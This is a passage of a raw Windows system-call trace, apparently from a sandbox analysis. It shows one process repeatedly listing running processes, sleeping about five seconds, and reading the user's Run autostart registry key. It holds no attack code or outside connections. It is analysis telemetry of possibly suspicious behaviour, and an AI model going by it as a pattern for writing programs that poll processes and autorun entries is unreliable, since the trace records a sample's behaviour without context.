RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.791] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.803] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.803] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.803] NtClose (Handle=0x154) returned 0x0 [0181.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.807] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.818] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.818] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.818] NtClose (Handle=0x154) returned 0x0 [0181.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.822] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.834] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.834] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.834] NtClose (Handle=0x154) returned 0x0 [0181.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.837] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.852] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.852] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.852] NtClose (Handle=0x154) returned 0x0 [0181.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.866] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.866] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.866] NtClose (Handle=0x154) returned 0x0 [0181.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.872] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.881] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.881] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.881] NtClose (Handle=0x154) returned 0x0 [0181.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.885] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.896] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.897] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.897] NtClose (Handle=0x154) returned 0x0 [0181.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.901] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.912] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.912] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.912] NtClose (Handle=0x154) returned 0x0 [0181.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.916] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.928] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.928] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.928] NtClose (Handle=0x154) returned 0x0 [0181.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.931] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.943] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.943] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.943] NtClose (Handle=0x154) returned 0x0 [0181.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.947] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.960] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.960] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.960] NtClose (Handle=0x154) returned 0x0 [0181.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.964] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.974] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.974] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.974] NtClose (Handle=0x154) returned 0x0 [0181.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.978] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.991] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.991] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.991] NtClose (Handle=0x154) returned 0x0 [0181.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.995] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.006] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 